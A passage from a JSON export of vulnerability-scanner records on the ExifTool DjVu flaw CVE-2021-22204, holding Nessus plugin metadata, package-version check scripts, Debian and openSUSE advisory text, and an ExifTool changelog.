"obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22204"], "modified": "2021-12-27T00:00:00", "id": "CPAI-2021-0912", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2023-01-24T14:47:50", "description": "A vulnerability was discovered in libimage-exiftool-perl, a library and program to read and write meta information in multimedia files, which may result in execution of arbitrary code if a malformed DjVu file is processed.\n\nFor Debian 9 stretch, this problem has been fixed in version 10.40-1+deb9u1.\n\nWe recommend that you upgrade your libimage-exiftool-perl packages.\n\nFor the detailed security status of libimage-exiftool-perl please refer to its security tracker page at:\nhttps://security-tracker.debian.org/tracker/libimage-exiftool-perl\n\nNOTE: 
Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-17T00:00:00", "type": "nessus", "title": "Debian DLA-2663-1 : libimage-exiftool-perl security update", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22204"], "modified": "2021-12-14T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:libimage-exiftool-perl", "cpe:/o:debian:debian_linux:9.0"], "id": "DEBIAN_DLA-2663.NASL", "href": "https://www.tenable.com/plugins/nessus/149515", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-2663-1. 
The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(149515);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/12/14\");\n\n script_cve_id(\"CVE-2021-22204\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/12/01\");\n\n script_name(english:\"Debian DLA-2663-1 : libimage-exiftool-perl security update\");\n script_summary(english:\"Checks dpkg output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"A vulnerability was discovered in libimage-exiftool-perl, a library\nand program to read and write meta information in multimedia files,\nwhich may result in execution of arbitrary code if a malformed DjVu\nfile is processed.\n\nFor Debian 9 stretch, this problem has been fixed in version\n10.40-1+deb9u1.\n\nWe recommend that you upgrade your libimage-exiftool-perl packages.\n\nFor the detailed security status of libimage-exiftool-perl please\nrefer to its security tracker page at:\nhttps://security-tracker.debian.org/tracker/libimage-exiftool-perl\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. 
Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2021/05/msg00018.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/stretch/libimage-exiftool-perl\"\n );\n # https://security-tracker.debian.org/tracker/source-package/libimage-exiftool-perl\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?df5f9b2e\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Upgrade the affected libimage-exiftool-perl package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'ExifTool DjVu ANT Perl injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libimage-exiftool-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:9.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/04/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/05/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/05/17\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n 
script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"9.0\", prefix:\"libimage-exiftool-perl\", reference:\"10.40-1+deb9u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-25T14:41:34", "description": "A vulnerability was discovered in libimage-exiftool-perl, a library and program to read and write meta information in multimedia files, which may result in execution of arbitrary code if a malformed DjVu file is processed.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-03T00:00:00", "type": "nessus", "title": "Debian DSA-4910-1 : libimage-exiftool-perl - security update", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, 
"obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22204"], "modified": "2021-12-14T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:libimage-exiftool-perl", "cpe:/o:debian:debian_linux:10.0"], "id": "DEBIAN_DSA-4910.NASL", "href": "https://www.tenable.com/plugins/nessus/149218", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-4910. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(149218);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/12/14\");\n\n script_cve_id(\"CVE-2021-22204\");\n script_xref(name:\"DSA\", value:\"4910\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/12/01\");\n\n script_name(english:\"Debian DSA-4910-1 : libimage-exiftool-perl - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"A vulnerability was discovered in libimage-exiftool-perl, a library\nand program to read and write meta information in multimedia files,\nwhich may result in execution of arbitrary code if a malformed DjVu\nfile is processed.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=987505\"\n );\n # https://security-tracker.debian.org/tracker/source-package/libimage-exiftool-perl\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?df5f9b2e\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/buster/libimage-exiftool-perl\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2021/dsa-4910\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Upgrade the libimage-exiftool-perl packages.\n\nFor the stable distribution (buster), this problem has been fixed in\nversion 11.16-1+deb10u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-22204\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'ExifTool DjVu ANT Perl injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libimage-exiftool-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:10.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/04/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/05/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", 
value:\"2021/05/03\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"10.0\", prefix:\"libimage-exiftool-perl\", reference:\"11.16-1+deb10u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-24T14:47:31", "description": "This update for perl-Image-ExifTool fixes the following issues :\n\nUpdate to version 12.25 fixes (boo#1185547 CVE-2021-22204)\n\n - JPEG XL support is now official\n\n - Added read support for Medical Research Council (MRC) image files\n\n - Added ability to write a number of 3gp tags in video files\n\n - Added a new Sony PictureProfile value (thanks Jos Roost)\n\n - Added a new Sony LensType (thanks LibRaw)\n\n - Added a new Nikon LensID (thanks Niels Kristian Bech Jensen)\n\n - Added a new Canon LensType\n\n - Decode more GPS information from Blackvue dashcam videos\n\n - Decode a couple of new NikonSettings tags (thanks Warren Hatch)\n\n - Decode a few new RIFF tags\n\n - Improved Validate option to add minor warning if standard XMP is 
missing xpacket wrapper\n\n - Avoid decoding some large arrays in DNG images to improve performance unless the -m option is used\n\n - Patched bug that could give runtime warning when trying to write an empty XMP structure\n\n - Fixed decoding of ImageWidth/Height for JPEG XL images\n\n - Fixed problem were Microsoft Xtra tags couldn't be deleted\n\nversion 12.24 :\n\n - Added a new PhaseOne RawFormat value (thanks LibRaw)\n\n - Decode a new Sony tag (thanks Jos Roost)\n\n - Decode a few new Panasonic and FujiFilm tags (thanks LibRaw and Greybeard)\n\n - Patched security vulnerability in DjVu reader\n\n - Updated acdsee.config in distribution (thanks StarGeek)\n\n - Recognize AutoCAD DXF files\n\n - More work on experimental JUMBF read support\n\n - More work on experimental JPEG XL read/write support\n\nversion 12.23 :\n\n - Added support for Olympus ORI files\n\n - Added experimental read/write support for JPEG XL images\n\n - Added experimental read support for JUMBF metadata in JPEG and Jpeg2000 images\n\n - Added built-in support for parsing GPS track from Denver ACG-8050 videos with the -ee option\n\n - Added a some new Sony lenses (thanks Jos Roost and LibRaw)\n\n - Changed priority of Samsung trailer tags so the first DepthMapImage takes precedence when -a is not used\n\n - Improved identification of M4A audio files\n\n - Patched to avoid escaping ',' in 'Binary data' message when\n\n -struct is used\n\n - Removed Unknown flag from MXF VideoCodingSchemeID tag\n\n - Fixed -forcewrite=EXIF to apply to EXIF in binary header of EPS files\n\n - API Changes :\n\n + Added BlockExtract option\n\nversion 12.22 :\n\n - Added a few new Sony LensTypes and a new SonyModelID (thanks Jos Roost and LibRaw)\n\n - Added Extra BaseName tag\n\n - Added a new CanonModelID (thanks LibRaw)\n\n - Decode timed GPS from unlisted programs in M2TS videos with the -ee3 option\n\n - Decode more Sony rtmd tags\n\n - Decode some tags for the Sony ILME-FX3 (thanks Jos Roost)\n\n - Allow 
negative values to be written to XMP-aux:LensID\n\n - Recognize HEVC video program in M2TS files\n\n - Enhanced -b option so --b suppresses tags with binary data\n\n - Improved flexibility when writing GPS coordinates :\n\n + Now pulls latitude and longitude from a combined GPSCoordinates string\n\n + Recognizes the full word 'South' and 'West' to write negative coordinates\n\n - Improved warning when trying to write an integer QuickTime date/time tag and Time::Local is not available\n\n - Convert GPSSpeed from mph to km/h in timed GPS from Garmin MP4 videos\n\nversion 12.21 :\n\n - Added a few new iOS QuickTime tags\n\n - Decode a couple more Sony rtmd tags\n\n - Patch to avoid possible 'Use of uninitialized value' warning when attempting to write QuickTime date/time tags with an invalid value\n\n - Fixed problem writing Microsoft Xtra tags\n\n - Fixed Windows daylight savings time patch for file times that was broken in 12.19 (however directory times will not yet handle DST properly)\n\nversion 12.20 :\n\n - Added ability to write some Microsoft Xtra tags in MOV/MP4 videos\n\n - Added two new Canon LensType values (thanks Norbert Wasser)\n\n - Added a new Nikon LensID\n\n - Fixed problem reading FITS comments that start before column 11\n\nversion 12.19 :\n\n - Added -list_dir option\n\n - Added the 'ls-l' Shortcut tag\n\n - Extract Comment and History from FITS files\n\n - Enhanced FilePermissions to include device type (similar to 'ls -l')\n\n - Changed the name of Apple ContentIdentifier tag to MediaGroupUUID (thanks Neal Krawetz)\n\n - Fixed a potential 'substr outside of string' runtime error when reading corrupted EXIF\n\n - Fixed edge case where NikonScanIFD may not be copied properly when copying MakerNotes to another file\n\n - API Changes :\n\n + Added ability to read/write System tags of directories\n\n + Enhanced GetAllGroups() to support family 7 and take optional ExifTool reference\n\n + Changed QuickTimeHandler option default to 1\n\nversion 12.18 
:\n\n - Added a new SonyModelID\n\n - Decode a number of Sony tags for the ILCE-1 (thanks Jos Roost)\n\n - Decode a couple of new Canon tags (thanks LibRaw)\n\n - Patched to read differently formatted UserData:Keywords as written by iPhone\n\n - Patched to tolerate out-of-order Nikon MakerNote IFD entries when obtaining tags necessary for decryption\n\n - Fixed a few possible Condition warnings for some NikonSettings tags\n\nversion 12.17 :\n\n - Added a new Canon FocusMode value\n\n - Added a new FujiFilm FilmMode value\n\n - Added a number of new XMP-crs tags (thanks Herb)\n\n - Decode a new H264 MDPM tag\n\n - Allow non-conforming lower-case XMP boolean 'true' and 'false' values to be written, but only when print conversion is disabled\n\n - Improved Validate option to warn about non-capitalized boolean XMP values\n\n - Improved logic for setting GPSLatitude/LongitudeRef values when writing\n\n - Changed -json and -php options so the -a option is implied even without the -g option\n\n - Avoid extracting audio/video data from AVI videos when\n -ee\n\n -u is used\n\n - Patched decoding of Canon ContinuousShootingSpeed for newer firmware versions of the EOS-1DXmkIII\n\n - Re-worked LensID patch of version 12.00 (github issue #51)\n\n - Fixed a few typos in newly-added NikonSettings tags (thanks Herb)\n\n - Fixed problem where group could not be specified for PNG-pHYs tags when writing version 12.16 :\n\n - Extract another form of video subtitle text\n\n - Enhanced -ee option with -ee2 and -ee3 to allow parsing of the H264 video stream in MP4 files\n\n - Changed a Nikon FlashMode value\n\n - Fixed problem that caused a failed DPX test on Strawberry Perl\n\n - API Changes :\n\n + Enhanced ExtractEmbedded option\n\nversion 12.15 :\n\n - Added a couple of new Sony LensType values (thanks LibRaw and Jos Roost)\n\n - Added a new Nikon FlashMode value (thanks Mike)\n\n - Decode NikonSettings (thanks Warren Hatch)\n\n - Decode thermal information from DJI RJPEG images\n\n 
- Fixed extra newline in -echo3 and -echo4 outputs added in version 12.10\n\n - Fixed out-of-memory problem when writing some very large PNG files under Windows\n\nversion 12.14 :\n\n - Added support for 2 more types of timed GPS in video files (that makes 49 different formats now supported)\n\n - Added validity check for PDF trailer dictionary Size\n\n - Added a new Pentax LensType\n\n - Extract metadata from Jpeg2000 Association box\n\n - Changed -g:XX:YY and -G:XX:YY options to show empty strings for non-existent groups\n\n - Patched to issue warning and avoid writing date/time values with a zero month or day number\n\n - Patched to avoid runtime warnings if trying to set FileName to an empty string\n\n - Fixed issue that could cause GPS test number 12 to fail on some systems\n\n - Fixed problem extracting XML as a block from Jpeg2000 images, and extract XML tags in the XML group instead of XMP\n\n - Update URL\n\nupdate to 12.13 :\n\n - Add time zone automatically to most string-based QuickTime date/time tags when writing unless the PrintConv option is disabled\n\n - Added -i HIDDEN option to ignore files with names that start with '.'\n\n - Added a few new Nikon ShutterMode values (thanks Jan Skoda)\n\n - Added ability to write Google GCamera MicroVideo XMP tags\n\n - Decode a new Sony tag (thanks LibRaw)\n\n - Changed behaviour when writing only pseudo tags to return an error and avoid writing any other tags if writing FileName fails\n\n - Print 'X image files read' message even if only 1 file is read when at least one other file has failed the -if condition\n\n - Added ability to geotag from DJI CSV log files\n\n - Added a new CanonModelID\n\n - Added a couple of new Sony LensType values (thanks LibRaw)\n\n - Enhanced -csvDelim option to allow '\\t', ' ', '\\r' and '\\\\'\n\n - Unescape '\\b' and '\\f' in imported JSON values\n\n - Fixed bug introduced in 12.10 which generated a 'Not an integer' warning when attempting to shift some QuickTime date/time 
tags\n\n - Fixed shared-write permission problem with -@ argfile when using -stay_open and a filename containing special characters on Windows\n\n - Added -csvDelim option\n\n - Added new Canon and Olympus LensType values (thanks LibRaw)\n\n - Added a warning if ICC_Profile is deleted from an image (github issue #63)\n\n - EndDir() function for -if option now works when\n -fileOrder is used\n\n - Changed FileSize conversion to use binary prefixes since that is how the conversion is currently done (eg. MiB instead of MB)\n\n - Patched -csv option so columns aren't resorted when using -G option and one of the tags is missing from a file\n\n - Fixed incompatiblity with Google Photos when writing UserData:GPSCoordinates to MP4 videos\n\n - Fixed problem where the tags available in a -p format string were limited to the same as the -if[NUM] option when NUM was specified\n\n - Fixed incorrect decoding of SourceFileIndex/SourceDirectoryIndex for Ricoh models\n\nUpdate to 12.10\n\n - Added -validate test for proper TIFF magic number in JPEG EXIF header\n\n - Added support for Nikon Z7 LensData version 0801\n\n - Added a new XMP-GPano tag\n\n - Decode ColorData for the Canon EOS 1DXmkIII\n\n - Decode more tags for the Sony ILCE-7SM3\n\n - Automatically apply QuickTimeUTC option for CR3 files\n\n - Improved decoding of XAttrMDLabel from MacOS files\n\n - Ignore time zones when writing date/time values and using the -d option\n\n - Enhanced -echo3 and -echo4 options to allow exit status to be returned\n\n - Changed -execute so the -q option no longer suppresses the '(ready)' message when a synchronization number is used\n\n - Added ability to copy CanonMakerNotes from CR3 images to other file types\n\n - Added read support for ON1 presets file (.ONP)\n\n - Added two new CanonModelID values\n\n - Added trailing '/' when writing QuickTime:GPSCoordinates\n\n - Added a number of new XMP-crs tags\n\n - Added a new Sony LensType (thanks Jos Roost)\n\n - Added a new Nikon Z lens 
(thanks LibRaw)\n\n - Added a new Canon LensType\n\n - Decode ColorData for Canon EOS R5/R6\n\n - Decode a couple of new HEIF tags\n\n - Decode FirmwareVersion for Canon M50\n\n - Improved decoding of Sony CreativeStyle tags\n\n - Improved parsing of Radiance files to recognize comments\n\n - Renamed GIF AspectRatio tag to PixelAspectRatio\n\n - Patched EndDir() feature so subdirectories are always processed when -r is used (previously, EndDir() would end processing of a directory completely)\n\n - Avoid loading GoPro module unnecessarily when reading MP4 videos from some other cameras\n\n - Fixed problem with an incorrect naming of CodecID tags in some MKV videos\n\n - Fixed verbose output to avoid 'adding' messages for existing flattened XMP tags\n\n - Added a new Sony LensType\n\n - Recognize Mac OS X xattr files\n\n - Extract ThumbnailImage from MP4 videos of more dashcam models\n\n - Improved decoding of a number of Sony tags\n\n - Fixed problem where the special -if EndDir() function didn't work properly for directories after the one in which it was initially called\n\n - Patched to read DLL files which don't have a .rsrc section\n\n - Patched to support new IGC date format when geotagging\n\n - Patched to read DLL files with an invalid size in the header \n\n - Added support for GoPro .360 videos\n\n - Added some new Canon RF and Nikkor Z lenses\n\n - Added some new Sony LensType and CreativeStyle values and decode some ILCE-7C tags\n\n - Added a number of new Olympus SceneMode values\n\n - Added a new Nikon LensID\n\n - Decode more timed metadata from Insta360 videos\n\n - Decode timed GPS from videos of more Garmin dashcam models\n\n - Decode a new GoPro video tag\n\n - Reformat time-only EventTime values when writing and prevent arbitrary strings from being written\n\n - Patched to accept backslashes in SourceFile entries for\n -csv option\n\nupdate to 12.06\n\n - Added read support for Lyrics3 metadata (and fixed problem where APE metadata may be ignored 
if Lyrics3 exists)\n\n - Added a new Panasonic VideoBurstMode value\n\n - Added a new Olympus MultipleExposureMode value\n\n - Added a new Nikon LensID\n\n - Added back conversions for XMP-dwc EventTime that were removed in 12.04 with a patch to allow time-only values\n\n - Decode GIF AspectRatio\n\n - Decode Olympus FocusBracketStepSize\n\n - Extract PNG iDOT chunk in Binary format with the name AppleDataOffsets\n\n - Process PNG images which do not start with mandatory IHDR chunk\n\n - Added a new Panasonic SelfTimer value\n\n - Decode a few more DPX tags\n\n - Extract AIFF APPL tag as ApplicationData\n\n - Fixed bug writing QuickTime ItemList 'gnre' Genre values\n\n - Fixed an incorrect value for Panasonic VideoBurstResolution\n\n - Fixed problem when applying a time shift to some invalid makernote date/time values\n\nupdate to 12.04 :\n\n - See /usr/share/doc/packages/perl-Image-ExifTool/Change \n\nupdate to 11.50, see Image-ExifTool-11.50.tar.gz for details\n\nUpdate to version 11.30 :\n\n - Add a new Sony/Minolta LensType.\n\n - Decode streaming metadata from TomTom Bandit Action Cam MP4 videos.\n\n - Decode Reconyx HF2 PRO maker notes.\n\n - Decode ColorData for some new Canon models.\n\n - Enhanced -geotag feature to set AmbientTemperature if available.\n\n - Remove non-significant spaces from some DICOM values.\n\n - Fix possible ''x' outside of string' error when reading corrupted EXIF.\n\n - Fix incorrect write group for GeoTIFF tags.\n\nUpdate to version 11.29\n\n - See /usr/share/doc/packages/perl-Image-ExifTool/Changes\n\nUpdate to version 11.27\n\n - See /usr/share/doc/packages/perl-Image-ExifTool/Changes\n\nUpdate to version 11.24\n\n - See /usr/share/doc/packages/perl-Image-ExifTool/Changes\n\nUpdate to version 11.11 (changes since 11.01) :\n\n - See /usr/share/doc/packages/perl-Image-ExifTool/Changes\n\nUpdate to 11.01 :\n\n - Added a new ProfileCMMType\n\n - Added a Validate warning about non-standard EXIF or XMP in PNG images\n\n - Added a new 
Canon LensType\n\n - Decode a couple more PanasonicRaw tags\n\n - Patched to avoid adding tags to QuickTime videos with multiple 'mdat' atoms --> avoids potential corruption of these videos!\n\nUpdate to 11.00 :\n\n - Added read support for WTV and DVR-MS videos\n\n - Added print conversions for some ASF date/time tags\n\n - Added a new SonyModelID\n\n - Decode a new PanasonicRaw tag\n\n - Decode some new Sony RX100 VI tags\n\n - Made Padding and OffsetSchema tags 'unsafe' so they aren't copied by default", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-18T00:00:00", "type": "nessus", "title": "openSUSE Security Update : perl-Image-ExifTool (openSUSE-2021-707)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22204"], "modified": "2022-01-26T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:exiftool", "p-cpe:/a:novell:opensuse:perl-File-RandomAccess", "p-cpe:/a:novell:opensuse:perl-Image-ExifTool", "cpe:/o:novell:opensuse:15.2"], "id": "OPENSUSE-2021-707.NASL", "href": "https://www.tenable.com/plugins/nessus/149550", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, 
Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2021-707.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(149550);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/26\");\n\n script_cve_id(\"CVE-2021-22204\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/12/01\");\n\n script_name(english:\"openSUSE Security Update : perl-Image-ExifTool (openSUSE-2021-707)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote openSUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for perl-Image-ExifTool fixes the following issues :\n\nUpdate to version 12.25 fixes (boo#1185547 CVE-2021-22204)\n\n - JPEG XL support is now official\n\n - Added read support for Medical Research Council (MRC) image files\n\n - Added ability to write a number of 3gp tags in video files\n\n - Added a new Sony PictureProfile value (thanks Jos Roost)\n\n - Added a new Sony LensType (thanks LibRaw)\n\n - Added a new Nikon LensID (thanks Niels Kristian Bech Jensen)\n\n - Added a new Canon LensType\n\n - Decode more GPS information from Blackvue dashcam videos\n\n - Decode a couple of new NikonSettings tags (thanks Warren Hatch)\n\n - Decode a few new RIFF tags\n\n - Improved Validate option to add minor warning if standard XMP is missing xpacket wrapper\n\n - Avoid decoding some large arrays in DNG images to improve performance unless the -m option is used\n\n - Patched bug that could give runtime warning when trying to write an empty XMP structure\n\n - Fixed decoding of ImageWidth/Height for JPEG XL images\n\n - Fixed problem were Microsoft Xtra tags couldn't be deleted\n\nversion 12.24 :\n\n - Added a new PhaseOne RawFormat value (thanks LibRaw)\n\n - Decode a new Sony 
